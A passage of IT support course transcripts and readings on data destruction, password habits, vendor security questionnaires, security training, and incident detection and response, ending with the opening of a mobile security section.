required to destroy specific data.
There are three categories of data destruction methods: recycling, physical destruction, and
third-party destruction. This reading will introduce the data destruction methods and how to
decide which method to use.
Recycling
Recycling includes methods that allow for device reuse after data destruction. This option is
recommended if you hope to reuse devices internally, sell surplus equipment, or your devices
are on loan and are due to be returned. Standard recycling methods include the following:
 Erasing/wiping: cleans all data off a device’s hard drive by overwriting it. Erasing or
wiping data can be done manually or with data-destruction software. This method is
practical when you only have a few devices that need data destroyed, as it takes a long
time. Note that it may take multiple passes to wipe highly sensitive data completely.
 Low-level formatting: erases all data written on the hard drive by replacing it with
zeros. Low-level reformatting can be done using a tool such as HDDGURU on a PC or
the Disk Utility function on a Mac.
 Standard formatting: erases the path to the data and not the data itself. Both PCs and
Macs have internal tools that can perform a standard format, Disk Management on a
PC or Disk Utility on a Mac. Note that standard formatting does not remove the data
from the device, enabling data rediscovery using software.
Physical destruction
Physical destruction includes any method that physically destroys a device to make it difficult
to retrieve data from it. You should only use physical destruction if you do not need to reuse
the device. However, only completely destroying the device ensures the destruction of all
data with physical methods. Physical destruction methods include the following:
 Drilling holes directly into the device wipes data out on the sections where there are
holes. However, individuals can recover data from the areas that are still intact.
 Shredding includes the physical shredding of hard drives, memory cards, CDs, DVDs,
and other electronic storage devices. Shredding reduces the potential for recovery.
Shredding requires special equipment or outsourcing to another facility.
 Degaussing uses a high-powered magnet which destroys the data on the device. This
method effectively destroys large data storage devices and renders the hard drive
unusable. As electronic technology changes, this method may become obsolete
 Incinerating destroys data by burning the device. Most companies do not have an
incinerator on-site. Devices need to be transported to a facility for incineration. Due to
this, devices can be lost or stolen in transit.
In addition to effectively destroying data on electronic devices, it is essential to follow best
practices for electronic device disposal.
Outsourcing
Outsourcing means using a third-party specializing in data destruction to complete the

physical or recycling process. This option appeals to companies that do not have the staff or
knowledge to complete the destruction themselves. Once a vendor has completed the task,
they issue a certificate of destruction/recycling.
The certificate of destruction serves as a statement of completed destruction of data on

electronics, hard drives, or other devices. The certificate includes the client’s contact
information, date of service, vendor company name, manifest, signature, method of
destruction, and legal statement. However, exercise caution as the certificate does not
indicate a level of training, auditing, or any other verification that a vendor is knowledgeable
about data destruction.
Key Takeaways
Data destruction makes data unreadable to an operating system or application. You should
destroy data on devices no longer used by a company, unused or duplicated copies of data,
or data that’s required to destroy. Data destruction methods include:
 Recycling: erasing the data from a device for reuse

 Physical destruction: destroying the device itself to prevent access to data
 Outsourcing: using an external company specializing in data destruction to handle
the process
Resource for further information
For more information about disposing of electronics, please visit Proper Disposal of
Electronic Devices, a resource from CISA.
USER HABITS
You've got to involve your users

when it comes to security.
It's super important and might seem obvious,
but it's usually overlooked.
You can build the world's best security systems,
but they won't protect you if the users are
going to be practicing unsafe security.
If a user writes their password on a Post-it Note,
sticks it to their laptop,
then leaves the laptop unlocked and unintended at a cafe,
you could have a disaster on your hands,
but making sure that your users
take reasonable security precautions,
takes effort, and can be really tricky,
you have to make sure your user's habits and actions
involve having clear and reasonable security policies,
but there's more that you can do to help ensure that
your users are diligent about maintaining security.
Let's assume that your employees are acting
with good intent and that leaks and
disclosures are unintentional and mostly
due to improper handling of sensitive data.
Leaks and disclosures can be avoided by
understanding what employees need
to do to accomplish their jobs.
You also need to make sure that they have
the right tools to get their work
done without compromising security.
If an employee needs to share a confidential file with
an external partner and it's too big to email,
they may want to upload it to
a third-party file-sharing website
that they have a personal account with.
This is risky business.
You should never upload confidential information onto
a third-party service that
hasn't been evaluated by your company.
If sharing big files with
external parties is common behavior for your employees,
it's best to find a solution that meets the needs
of your users and the security guidelines.
By providing a sanctioned and approved
mechanism for this file sharing activity,
users are less likely to expose
the organization to unnecessary risk.
We covered password security when we
discussed password authentication earlier,
but there's more to talk about when it
comes to users and passwords.
I hate to say it, but generally speaking,
users can be lazy about security stuff.
They don't like to memorize long complicated passwords,
but this is super important to keeping your company safe.
How do we resolve this conflict?
If we require 20-character passwords
that have to be changed every three months,
our users will almost definitely write them down.
This compromises the security that
our complex password policy is supposed to provide.
It's important to understand what
threats password policies are
supposed to protect against.
That way, you can try to find
a better balance between security and usability.
Along and complex password requirement
is designed to protect against brute force attacks,
either against authentication systems or
if a hashed password database is stolen.
Since direct brute-force attacks
against authentication infrastructure
should be easily detected and
blocked by intrusion prevention systems,
they can be considered pretty low-risk,
but the theft of
a password database would be a super serious breach.
We do have lots of additional layers
of security in place to
prevent a critical compromise
like that from happening in the first place.
The two attacks that complex passwords are
primarily designed to protect
against are fairly low-risk.
Now, we can relax the password requirements
a bit and not ask for overly long passwords.
We can even adjust
the mandatory password rotation time period.
Password reuse is another common user behavior.
People don't want a bunch of passwords to memorize.
Lots of users find it easier to use
the same password for
both their personal email
account and their work account,
but this undermines the security of their work password.
If an online service is compromised and
the password database is leaked, they're in trouble.
The passwords in that database will find their way into
password files used for
cracking passwords and brute force attacks.
Once a password isn't a secret,
it shouldn't be used anymore.
The chances of a bad actor
being able to use the password are too high.
That's why it's important to make sure employees use
new and unique passwords
and don't reuse them from other services.
It's also important to have
a password change system check against old passwords.
This will prevent users from
changing their password back to
a previously used potentially compromised password.
A much greater risk in the workplace that users should be
educated on is credential theft from phishing emails.
Phishing emails are pretty effective.
They take advantage of people's inclination to
open emails without looking at them too closely.
If an email that seems authentic
actually leads to a fake login page,
users can blindly enter their credentials into
the fake site and
disclose their credentials to an attacker.
While having two-factor authentication
helps protect against this type of attack,
OTP based two-factor solutions
would still provide usable credentials to an attacker,
plus the attacker still has a password,
which is really not
good even in a two-factor environment.
If someone enter their password into
a phishing site or even suspects they did,
it's important to change
their password as soon as possible.
If you can, your organization should try to detect
these types of password disclosures
using tools like Password Alert.
This is a Chrome extension from
Google that can detect when you
enter your password into a site that's not a Google page.
Being able to detect when a password is entered into
a potentially untrustworthy site lets
an organization detect potential phishing compromises,
but you can also combat phishing attacks with
good spam filtering combined with good user education.
You can help influence
good user behavior by offering security training.
Supplemental Reading for User Habits

To help prevent password phishing, check out tools like Password Alert.
THIRDY PARTY SECURITY
Sometimes you need to rely on third party solutions or

service providers because you might not be able to do everything in house.
This is especially true if you work as an IT support specialist in a small shop.
In some cases, you have to trust that third party with a lot of
potentially sensitive data or access.
So how do you make sure that you aren't opening yourself up to a ton of
unnecessary risk?
When you contract services from a third party,
you're trusting them to protect your data and any credentials involved.
If they have subpar security, you're undermining your security defenses by
potentially opening a new avenue of attack.
It's important to hire trustworthy and reputable vendors whenever you can.
You also need to manage the engagements in a controlled way.
This involves conducting a vendor risk review or security assessment.
In typical vendor security assessments, you ask vendors to complete
a questionnaire that covers different aspects of their security policies,
procedures and defenses.
The questionnaire is designed to determine whether or
not they've implemented good security designs in their organization.
For software services or hardware vendors,
you might also ask to test the software hardware.
That way you can evaluate it for potential security vulnerabilities or
concerns before deciding to contract their services.
It's important to understand how well protected your business partners
are before deciding to work with them.
If they have poor security practices, your organization's security could be at risk.
If you contract services from a company that will be handling data on your behalf,
the security of your data is in the hands of this third party.
It's important to understand how safe your data will be with them.
Sometimes, vendors will perform tasks for you so
they have access to your network and systems.
In these cases, it's also important to understand how well secured third party
is, a compromise of their infrastructure could lead to a breach of your systems.
While the questionnaire model is a quick way to assess a third party,
it's not ideal.
It depends on self reporting of practices which is pretty unreliable,
without a way to verify or prove what's stated in the questionnaire.
You have to trust that the company is answering honestly, why you'd hope that
a company you're doing business with would be honest is best to verify.
If you can, ask for a third- party security assessment report.
Some of the information on the questionnaire can be verified like third
party security audit results and penetration testing reports.
In the case of third party software,
you might be able to conduct some basic vulnerability assessments and
tests to ensure the product has some reasonable security.
There are lots of companies that will evaluate vendors for you for a price, but
Google recently made their vendor security assessment questionnaires available
for free.
This is a great starting point to design your own vendor security assessment
questionnaire.
Or you can just use these as is if the third party service
involves the installation of any infrastructure equipment on site.
Pay close attention to how they're doing it, you have to make sure this equipment
is managed in a way that doesn't negatively affect overall security.
Let's say the vendor company requires remote access to the infrastructure device
to perform maintenance.
If that's the case,
then make appropriate adjustments to firewall rules to restrict this access.
That way,
you'll make sure that it can't be used as an entry point into your network.
Additional monitoring would also be recommended for this third party device,
since it represents a new potential attack surface in your network.
If the vendor lets you, evaluate the hardware in a lab environment, first,
there you can run in depth vulnerability assessments and
penetration testing of the hardware.
And make sure there aren't any obvious vulnerabilities in the product.
Report your findings to the vendor and ask that they address any issues you discover.
Supplemental Reading for Vendor Security

Assessment Questionnaires
Google recently made their Vendor Security Assessment Questionnaires available for
free. You can check them out here.
Infrastructure Security Questionnaire 🔗Questionnaire Options🔗
Select the options that describe your project. These settings configure the questionnaire to fit
different scenarios.
Sensitive data: This project involves processing Personally Identifiable Information (PII), Sensitive
PII, or other information your customers may consider sensitive.
Remote access only: All information processing occurs on your customers' systems, and this project
accesses those systems remotely.
Network🔗
Why this section matters: Your network is the foundation of your IT infrastructure and the first line of
defense against external attackers. If the devices that make up your network are not adequately
maintained and secured, an attacker might gain access to confidential information.
It's essential to have a written set of guidelines for the configuration, maintenance, and use of your
network. Written guidelines and rules help preserve the availability, integrity, and confidentiality of
the network itself, and well as the information transmitted over it.
We have clearly defined network guidelines. They are regularly reviewed and applied to all
appropriate networking devices.
We don't currently have guidelines, or they're not consistently applied.
Firewalls are a basic network security control. Does your company use firewalls to restrict traffic into
and out of your network at strategic points?
Yes, we have firewalls for filtering all inbound and outbound traffic.
We do not use firewalls.
Is encryption and integrity protection in place for all internal network traffic that potentially carries
sensitive information (including passwords, emails, files, source code, management traffic, etc.)?
Yes
Some unencrypted protocols may carry sensitive information.
Have you implemented monitoring and alerting for your network?
Yes
No
Do you operate wireless networks that allow access to private aspects of your infrastructure (i.e., Wi-
Fi networks, excluding networks that only allow guests access to the Internet)?
Yes.
No, we only have Wi-Fi networks that allow guests to access the Internet; they don't have access to
any private aspects of our infrastructure.
Do you operate a VPN that allows remote access to your network?
Yes
No
Is the management of your network (or parts thereof) outsourced?
Yes
No
Do you have any other comments about the security of your network? If yes, please provide them
below:
Servers🔗
Why this section is relevant: Servers are an important piece of the overall attack surface of any IT
infrastructure. Even seemingly less-sensitive systems should be carefully evaluated, because a single
poorly configured system can help an attacker get a foot in the door. From there, they might gain
access to more sensitive systems nearby (other servers, clients, etc.).
Do you have operating system hardening in place, or build standards for server systems?
Yes, all of our servers are configured according to these standards.
We do not have these standards, or we don't apply them uniformly across the fleet.
Do you have a process for installing operating system and application updates and security patches on
servers?
Yes, we are very diligent about applying security updates to operating systems and applications.
No, we don't have a process for patching. Some updates might fall through the cracks.
Are your systems configured to log security-relevant events, such as authentication, data access, etc.?
Yes, we have comprehensive logging, including security events, for all relevant services.
No, our logging is basic or incidental.
Administrative Access🔗
Select the operating systems that are currently in use on your servers:
Microsoft Windows
Unix (including Linux, Solaris, etc.)
Backups🔗
Do you store backups on disks, tapes, or other kinds of removable media?
Yes.
No.
Do you have procedures in place for working with customers to determine an appropriate backup
frequency?
Yes, we talk to our customers to gather requirements for backup frequency, and we implement
backup intervals accordingly.
No, we have a fixed backup cycle.
Do you regularly test your backups?
Yes, we test the entire process of recovery, including restoring entire systems from backup.
We don't usually test backups.
Is the management of your servers (or parts thereof) outsourced?
Yes
No
Is there anything else you want us to know about the security of your servers?
Clients (Workstation, Laptops, etc.)🔗
Why this section matters: In most companies, almost all IT-related work is performed from client
computers. Even if certain data is stored in the cloud or on highly secure servers, it's the laptops and
desktops that are used to access this information. An attacker who manages to compromise a client
computer will in most cases be able to completely impersonate the user of the machine, gaining the
same access rights. If an administrator's client machine is affected by an attack, the attacker will likely
be able to escalate their foothold to many other important systems in your company. It's therefore
critical to ensure the security of the client machines used by your employees.
Do you have operating system hardening and/or build standards for client systems?
Yes, all of our client systems are configured according to these standards, and/or they are built from
standard images that comply with our hardening guidelines.
We do not have hardening or build standards, or we don't apply them uniformly across the fleet.
Do you have a process for installing operating system and application updates and security patches on
client systems?
Yes, we diligently apply security updates to operating systems and applications.
No, we don't have a process for patching. Some updates might fall through the cracks.
Do you have controls in place to protect client systems from malware?
Yes, we regularly scan our client systems for known malware, or we limit client systems to
whitelisted software identified by cryptographic hashes.
Some systems in our client fleet may not be fully protected.
Are your client systems configured to log security-relevant events, such as authentication, data access,
etc.?
Yes, we have comprehensive logging enabled on client systems, including security events.
No, our logging is basic or incidental.
What level of access do regular users have on their workstation/laptop?
Regular users have (unprivileged) user access on their machines. We have a process in place for
granting local administrative access to users who demonstrate a clear need.
Users are local administrators on their machines.
Do all clients use the same local administrator/root password?
Yes, the local root or administrator password is the same for all (or many) client systems.
No, local Administrator/root accounts are disabled, or a different password is set for all machines.
One major risk factor in many corporate environments is the use of older versions of Windows. Does
your company still have systems running Windows Vista or earlier versions?
Yes, some or all of our client machines still run Windows Vista or earlier versions.
No, our client machines do not run Windows Vista or earlier versions. Legacy installations have
been completely separated from our main infrastructure and cannot access any of your information.
Encryption🔗
Do you fully encrypt the hard disks of laptops and other portable client devices?
Yes, we use full-disk encryption for our laptop fleet.
No, laptop hard disks are not fully encrypted. Users are responsible for protecting sensitive
information on laptops.
Do you allow access to confidential information (e.g., email) from unencrypted mobile devices such as
phones and tablets?
Yes, our users can sync potentially confidential information like email onto their mobile phones or
tablets.
No, we do not allow access to corporate information from unencrypted devices such as mobile
phones or tablets.
Is there anything else you want us to know about the security of your client systems?
Technical Security Testing🔗
Why this section matters: In addition to audits of your information security program, you should
perform technical security testing of information systems to make sure they function as intended, and
that the data is properly protected. Some security issues, particularly in proprietary software, can only
be identified manually; therefore both manual and automated testing should be performed. Even if
the project exclusively uses standard off-the-self software, technical security testing helps ensure that
software and infrastructure are configured securely and free of known security issues.
Does an independent third party regularly perform penetration tests on all systems used to provide
services to customers?
Yes.
No, we rarely or never have independent third parties do penetration tests.
Are all of the systems used in this project scanned for host-level vulnerabilities? (Note: This question
does not refer to anti-malware scans. Instead, it refers to scans that look for known vulnerabilities
and misconfiguration of the software running on servers.)
Yes
No
In addition to third-party penetration tests and security scans, do you have security know-how
internally, and do you use that know-how to conduct in-house security testing?
Yes, our security team does technical security reviews of the systems used for this project.
No, we don't do in-house security testing.
Is there anything else you want us to know about the security testing of your infrastructure and/or
product?
Security Contact🔗
Please provide the email addresses (separated by semicolons) of team members who should be
contacted about any security issues:
Feedback🔗
Good news! You have made it to the end of this questionnaire. If you can spare another minute,
please let us know how we can improve it. Any feedback is highly appreciated.
SECURITY TRAINING
The more trained up you and your colleagues are on security, the better.
It's impossible to have good security practices at your company if employees and
users haven't received good trainings and resources.
This will boost a healthy company culture and overall attitude towards security.
A working environment that encourages people to speak up when they feel
something isn't right is critical.
It encourages them to do the right thing.
To help create this context, it's important for
employees to have a way that they can ask questions when they come up.
This could be a mailing list where users can ask questions about security
concerns or to report things they suspect are security risks.
Having the designated communication channel where people can feel comfortable
asking questions and getting clear answers back is super important.
Helping others keep security in mind will help decrease the security burdens
you'll have as an IT support specialist.
It will also make the overall security of the organization better.
Creating a culture that makes security a priority isn't easy.
You have to reinforce and
reward behaviors that boost the security of your organization.
Think of the small things we do every day when we use our computers,
just entering your password to log in or
locking your screen when you walk away from your computer is helpful.
Hopefully, you're careful about entering your password on websites and
check the address of the site you're authenticating against.
If you aren't,
try it out to avoid entering your password into a fake website.
When you're working on your laptop in a public space like a library or
coffee shop, do you lock your screen when you leave to use the restroom or
get another caffeine fix?
If not you absolutely should be.
Hopefully, you aren't leaving your computer unattended in public
in the first place.
That's a really bad idea.
These are the types of small things that security training should address.
You also need to justify why these are good behaviors to adopt.
In some cases, the company culture can turn screen locking into a sort of game.
When colleagues forget to lock their screen,
other team members can play harmless pranks on them.
The last time I forgot to lock my computer,
my colleague changed the default language to Turkish.
It reminded me to always lock my screen because anyone with access to the machine
can impersonate you and get access to any resources you're logged into.
But building a culture that embraces security principles isn't always enough.
There are some things that all employees should know.
This is when an occasional mandatory security training course can help.
This could be a short video or informational presentation followed by
a quiz to see if your employees understood the key concepts covered in the training.
The quiz can also increase the chances of information being retained.
Making employees retake the training every once a year or so
ensures that everyone is up to date on their training.
You can also cover new concepts or updated policies when needed.
This type of training should cover the most common attack types and
how to avoid falling victim to them.
This includes things like phishing emails and best practices around password use.
These trainings often include scenarios that can help test the user's
understanding of a particular topic.
Training courses like these are the last in the line of defenses that you and
your company need to have in place to make sure that you're as safe as possible for
as long as possible.
QUALITY OF IT CANDIDATE
To have a successful career in IT

there are several things that are needed.
Tenacity, grid, being
able to solve challenging problems.
Again, not having all the knowledge
to solve it but knowing how to get there.
For me, a great IT support candidate
or get a great IT candidate.
Somebody that's not afraid to
make mistakes is having that tenacity,
being able to deal with some of the downsides
because that is a big part
of it is the learning part of it.
That ability to look
at something and say, this is something,
even though it seems insurmountable, it seems huge,
I can attack this in whatever small degrees and fix it.
Very early on was interviewing for techs many years ago.
I worked in a small space in downtown Ann Arbor and
it was a alleyway in
the back of our office and weird fire escape came on
the second floor of
his office and in was this fire escape
leading up and I was
waiting for an interview candidate to come in,
somebody I had never met before.
The receptionist comes up to me
a few minutes later and tells
me that the interview candidate was here.
I sit down with a person I said,
"You the person that was
escorted in a few minutes ago from the back" and he says,
yeah, what had happened was he
couldn't find the entrance of the building.
Very complicated, [inaudible].
It was an odd building. It wasn't well-marked.
The doors were hard to
find a lot of people run into that.
So he went around the back to this greasy alleyway.
Here he was in a suit coming in for an interview.
He climbed this rusty old fire escape
banged on the backdoor to get in,
and that had me sold right from the beginning.
I'm like here's a problem,
regardless of whether
or not he was going to be a little bit
dirty or sweaty or whatever he found a way to solve it.
That's really what I look for.
Again, for that level of tenacity
where even if they struggled,
sometimes I prefer that.
This was hard for me,
but I got through it and I was successful
in the end. That's what I look for.
INCIDENT REPORTING
We try our best to protect our systems and networks, but

it's pretty likely that some sort of incident will happen.
This could be anything from a full system compromise and
data theft to someone accidentally leaking a memo.
Regardless of the nature of the incident,
proper incident handling is important to understanding what exactly happened and
how it happened and how to avoid it from happening again.
The very first step of handling an incident is detected in the first place.
Hopefully, our intrusion detection systems caught the telltale signs of an ongoing
attack and alerted us to the threat,
incidents can be brought to your attention in other ways too.
An employee may have noticed something suspicious and

reported it to the security team for
investigation or maybe they leaked information that ended up in the news.
However you found out about the incident, the next step is to analyze it and
determine the effects and scope of damage.
Was it a data leak or information disclosure?
If so, what information got out?
How bad is it, where systems compromised?
What systems and what level of access did they manage to get?
Is it a malware infection?
What systems were infected?
Some attacks are really obvious with very clear signs of an intrusion, like
a defaced web page or unusual processes consuming all resources in the system.
Others may be way more subtle and almost impossible to detect.
Like a small change to a single system configuration file.
This is why having good monitoring in place is so
important along with understanding your baseline.
Once you figure out what normal traffic looks like on your network and
what services you expect to see, outliers will be easier to detect.
This is important because every false lead that the incident response team has to
investigate means time and resources wasted.
This has the potential to allow real intrusions to go undetected and
uninvestigated longer.
During detection and scoping correlating data from different systems can reveal
a much bigger picture of what's happened.
It might show how an intruder gained access.
For example,
you could see a connection event logged by the firewall from a suspicious IP address.
Searching for other events related to this IP address may reveal login attempts in
the authentication logs for a system.
This would provide insight into where the attacker is coming from and
what they attempted to do on the network.
The authentication logs would also indicate whether or
not they were able to successfully log into an account.
If so, that's let you know what account is compromised.
Once the scope of the incident is determined, the next step is containment.
You need to contain the breach to prevent further damage for system compromises and
malware infection.
This is a pretty time sensitive step.
You don't want the malware or attacker to use one compromised machine to pivot
to other machines inside your network.
This could broaden the incident scope and cause even more damage.
Containment strategies will vary depending on the nature of the incident.
If an account was compromised, change the password immediately.
If the owner is unable to change the password right away,
then lock the account, also revoke any long live authentication tokens.
Since the attacker may have one of those two.
If it's a malware infection, can our anti malware software quarantine or
remove the infection.
If not the infected machine needs to be removed from the network as soon
as possible to prevent lateral movement around the network, to do this, you can
adjust network based firewall rules to effectively quarantine the machine.
You can also move the machine to a separate V Land used for
security quarantining purposes.
This would be a V-land with strict restrictions and
filtering applied to prevent further infection of other systems and networks.
It's important during this phase that efforts are made
to avoid the destruction of any logs or forensic evidence.
Attackers will usually try to cover their tracks by modifying logs and
deleting files, especially when they suspect they've been caught.
They'll take measures to make sure they keep their access to compromised systems.
This could involve installing a backdoor or some kind of remote access malware.
Another step to watch out for is creating a new user account that they can use
to authenticate with in the future with effective logging, configurations and
systems in place.
These activities would show up in audit logs.
So this type of access should be detected during an incident investigation.
Then actions can be taken to remove access.
I hope I'm not scaring you with all these scenarios, but
it's better to be safe than sorry.
Another part of incident analysis is determining severity, impact and
recovery ability of the incident,.
Severity includes factors like what and how many systems were compromised and
how the breach affects business functions.
An incident that's compromised a bunch of machines in the network would be more
severe than one where a single web server was hacked.
For example, you can imagine that the effort required to fix a large scale
compromise would negatively affect the ability to do normal work.
So the impact of an incident is also an important issue to consider if
the organization only had one web server and it was compromised,
it might be considered a much higher severity breach.
It would probably have a direct externally visible impact on the business.
Data exfiltration is the unauthorized transfer of data from a computer.
It's also a very important concern when a security incident happens,
hackers may try to steal data for a number of reasons.
They may want to steal account information to provide access later.
They may target business data to publish online to cause financial loss or
damage to the organization's reputation.
In some cases, the attacker may just want to cause damage and
destruction which might involve the leading or corrupting data.
What actions have been taken will affect the recovery ability of the incident.
The recovery ability is how complicated and
time consuming the recovery effort will be.
An incident that can be recovered with a simple restoration from backup by
following documented procedures would be considered easily recovered from.
But an incident where an attacker deleted large amounts of customer information and
wrecked havoc across lots of critical infrastructure systems would be way more
difficult to recover from.
It might not be possible to recover from it at all.
In some cases, depending on backup systems and configurations,
some data may be lost forever and can't be restored.
Backups won't contain any changes or
new data that were made after the last backup run.
Incident Response
Incident Response
When you’ve had a data breach, you may need forensic analysis to analyze the attack. This analysis usually
involves extensive evidence gathering. This reading covers some considerations for protecting the integrity
of your forensic evidence and avoiding complications or issues related to how you handle evidence.
Regulated data
It’s important to consider the type of data involved in an incident. Many types of data are subject to
government regulations that require you to take extra care when handling it. Here are some examples
you’re likely to encounter as an IT support specialist.
1. Protected Health Information: This information is regulated by the Health Insurance Portability and
Accountability Act (HIPAA). It is personally identifiable health information that relates to:
 Past, present, or future physical or mental health or condition of an individual

 Administration of health care to the individual by a covered provider (for example, a hospital or
doctor)
 Past, present, or future payment for the provision of health care to the individual
2. Credit Card or Payment Card Industry (PCI) Information: This is information related to credit, debit,
or other payment cards. PCI data is governed by the Payment Card Industry Data Security Standard (PCI
DSS), a global information security standard designed to prevent fraud through increased control of credit
card data.
3. Personally Identifiable Information (PII): PII is a category of sensitive information associated with a
person. Examples include addresses, Social Security Numbers, or similar personal ID numbers.
4. Federal Information Security Management Act (FISMA) compliance: FISMA requires federal agencies
and those providing services on their behalf to develop, document, and implement specific IT security
programs and to store data on U.S. soil. For example, organizations like NASA, the National Institutes of
Health, the Department of Veteran Affairs—and any contractors processing or storing data for them—need
to comply with FISMA.
5. Export Administration Regulations (EAR) compliance: EAR is a set of U.S. government regulations
administered by the U.S. Department of Commerce’s Bureau of Industry and Security (BIS). These
regulations govern the export and re-export of commercial and dual-use goods, software, and technology.
Dual-use goods are items that can be used both for civilian and military applications. These goods are
heavily regulated because they can be classified for civilian use and then transformed for military
purposes.
Digital rights management (DRM)
Digital Rights Management (DRM) technologies can help ensure data regulations compliance. DRM
technology comes in the form of either software or hardware solutions. Both options allow content
creators to prevent deliberate piracy and unauthorized usage. DRM often involves using codes that prohibit
content copying or limit the number of devices that can access a product. Content creators can also use
DRM applications to restrict what users can do with their material. They can encrypt digital media so only
someone with the decryption key can access it. This gives content creators and copyright holders a way to:
 Restrict users from editing, saving, sharing, printing, or taking screenshots of content or products
 Set expiration dates on media to prevent access beyond that date or limit the number of times
users can access the media
 Limit access to specific devices, Internet Protocol (IP) addresses, or locations, such as limiting
content to people in a specific country
Organizations can use these DRM capabilities to protect sensitive data. DRM enables organizations to track
who has viewed files, control access, and manage how people use the files. It also prevents files from being
altered, duplicated, saved, or printed. DRM can help organizations comply with data protection
regulations.
End User Licensing Agreement (EULA)
End User Licensing Agreements (EULAs) are similar to DRM in specifying certain rights and restrictions that
apply to the software. You often encounter EULA statements when installing a software package, accessing
a website, sharing a file, or downloading content. A EULA is usually considered a legally binding agreement
between the owner of a product (e.g., a software publisher) and the product's end-user. The EULA specifies
the rights and restrictions that apply to the software, and it’s usually presented to users during installation
or setup of the software. You can’t complete an installation (or access, share, or download data) until you
agree to the terms written in the EULA statement.
Unlike DRM restrictions, EULAs are only valid if you agree to it (i.e., you check a box or click the ‘I Agree’
button). DRM restrictions don’t require your agreement—or rely on you to keep that agreement. DRMs are
built into the product they protect, making it easier for content creators to ensure users do not violate
restrictions.
Chain of custody
“Chain of custody” refers to a process that tracks evidence movement through its collection, safeguarding,
and analysis lifecycle. Maintaining the chain of custody makes it difficult for someone to argue that the
evidence was tampered with or mishandled. Your chain of custody documentation should answer the
following questions. Documentation for these questions must be maintained and filed in a secure location
for current and future reference.
 Who collected the evidence? Evidence can include the afflicted or used devices, media, and
associated peripherals.
 How was the evidence collected, and where was it located?
 Who seized and possessed the evidence?
 How was the evidence stored and protected in storage? The procedures involved in storing and
protecting evidence are called evidence-custodian procedures.
 Who took the evidence out of storage and why? Ongoing documentation of the names of
individuals who check out evidence and why must be kept.
When a data breach occurs, forensic analysis usually involves taking an image of the disk. This makes a
virtual copy of the hard drive. The copy lets an investigator analyze the disk’s contents without modifying
or altering the original files. An alteration compromises the integrity of the evidence. This kind of
compromised integrity is what you want to avoid when performing forensic investigations.
Key takeaways:
Incident handling requires careful attention and documentation during an incident investigation's analysis
and response phases.
 Be familiar with what types of regulated data may be on your systems and ensure proper
procedures are in place to ensure your organization’s compliance.
 DRM technologies can be beneficial for safeguarding business-critical documents or sensitive
information and helping organizations comply with data protection regulations.
 When incident analysis involves the collection of forensic evidence, you must thoroughly
document the chain of custody.
INCIDENT RESPONSE AND RECOVERY
Once the threat has been detected and contained,

it has to be removed or remediated.
When it comes to malware infection,
this means removing the malware from affected systems.
But in some cases,
this may not be possible,
so the affected systems have to be
restored to a known good configuration.
This can be done by rebuilding
the machine or restoring from backup.
Take care when removing malware from systems,
because some malware is designed to be very persistent,
which means it's resistant to being removed.
But before we can start the recovery,
we have to contain the incident.
This might involve shutting down affected systems
to prevent further damage or spread of an infection.
On the flip side of that,
affected systems may just have network access
removed to cut off
any communication with the compromised system.
Again, the motivating factor
here would be to prevent the spread
of any infection or
to remove remote access to the system.
The containment strategy varies
depending on the nature of the affected system.
Let's say a critical piece of
networking infrastructure was compromised.
A quick shutdown may not work
since it would impact other business operations.
On top of that, removing networking access
might trigger fail safes and attack software or malware.
Let's say a piece of malware is designed to
periodically check into a command and control server.
Severing network communications with
the infected host might cause
the malware to trigger
a self-destruct function in
an attempt to destroy evidence.
Forensic analysis may need
to be done to analyze the attack.
This is especially true when it
comes to a malware infection.
In the case of forensic analysis,
affected machines might be investigated very
closely to determine exactly what the attacker did.
This is usually done by taking an image of the disk,
essentially making a virtual copy of the hard drive.
This lets the investigator
analyze the contents of the disk
without the risk of modifying
or altering the original files.
If that happened, it would compromise
the integrity of any forensic evidence.
Usually evidence gathering is
also part of the incident response process.
This provides evidenced to law enforcement if
the organization wants to pursue
legal action against the attackers.
Forensic evidence is super useful for providing
details of the attack to the security community.
It allows other security teams to be aware of
new threats and lets them better defend themselves.
It's also very important that you get members from
your legal team involved in any incident handling plans.
Because an incident can have
legal implications for the company,
a lawyer should be available to consult and
advise on the legal aspects of the investigation.
It's crucial in order to avoid
complications or issues of liability.
Members of the public relations team
should also get involved
since these incidents can have
an impact on a company's reputation.
There's another part of the cleanup and
recovery phase I should call out.
We'll need to use information from the analysis
to prevent any further intrusions or infections.
First, we determine the entry point to figure out how
the attacker got in or
what vulnerability the malware exploited.
This needs to be done at the same time as the cleanup.
If you remove the malware infection without
also addressing the underlying vulnerability,
systems could become
re-infected right after you clean them up.
Postmortems can be a great way to document incidents.
The learnings from post-mortems can be used
to prevent those incidents from happening again.
If a critical system has been compromised,
remediation can be complicated because of
downtime during remediation and recovery,
logs have to be audited to determine exactly what
the attacker did while they had access to the system.
They'll also tell you what data the attacker accessed.
Systems must be scrutinized to ensure
no back doors have been installed
or malware planted on the system.
Depending on the severity of the compromise or infection,
it might be necessary to
rebuild the system from the ground up.
Clean up will typically involve restoring from
a backup point to a known good configuration.
Infected or corrupted system files
can be restored from known good copies.
Sometimes cleanup can be very simple and quick.
I hope that's what you find more often than not.
If a website was defaced,
the attacker may have simply uploaded
their defaced HTML file
and pointed the web server at the new file.
A configuration file change and deletion of
the attackers HTML file would undo those changes.
Even so, efforts needs to be made
to determine how the attacker got access.
That vulnerability should be
closed to prevent any future attacks.
When all traces of the attack have been removed and
discovered and the known vulnerabilities have been closed,
you can move on to the last step.
That's when systems need to be thoroughly tested
to make sure proper functionality has been restored.
Usually, affected systems
would also remain under close watch,
sometimes with additional detailed monitoring
and logging enabled.
This is to watch for any additional signs of
an intrusion in case
something was missed during the cleanup.
It's also possible that the attacker
will attempt to attack the same target again.
There's a very high chance that they use
the same or similar attack methodology
on other targets in your network.
It's important to incorporate
the lessons you've learned from
any incident into your overall security defenses.
Update firewall rules and ACLs if
an exposure was discovered
in the course of the investigation.
Create new definitions and rules for
intrusion detection systems that can
watch for the signs of the same attack again.
Stay vigilant and prepared
to protect your system from attacks.
Remember that at some point,
some security breach will happen,
just they come and execute
your plan to counter attack the breach.
MOBILE SECURITY AND PRIVACY
Keeping mobile devices secure is super important.

Think about the kind of data that a mobile device can have email,
personal files, photos, health data, location data and so on.
Mobile devices travel with us and they aren't protected by the same level of
physical security as a server in a data center.
Mobile devices are easily misplaced or stolen.
So we need to be sure to secure these devices, as we go through this video,
remember that many of the settings that we will discuss can be automatically
configured or required by policy using mobile device management.
One of the most basic protections you can enable on a smartphone or
tablet is a screen lock.
A screen lock presents some kind of challenge that you have to respond to,
in order to unlock the device.
You might enter a pin or password, you might draw a pattern on screen or
you might use biometric data like a fingerprint or
even your face to unlock the device.
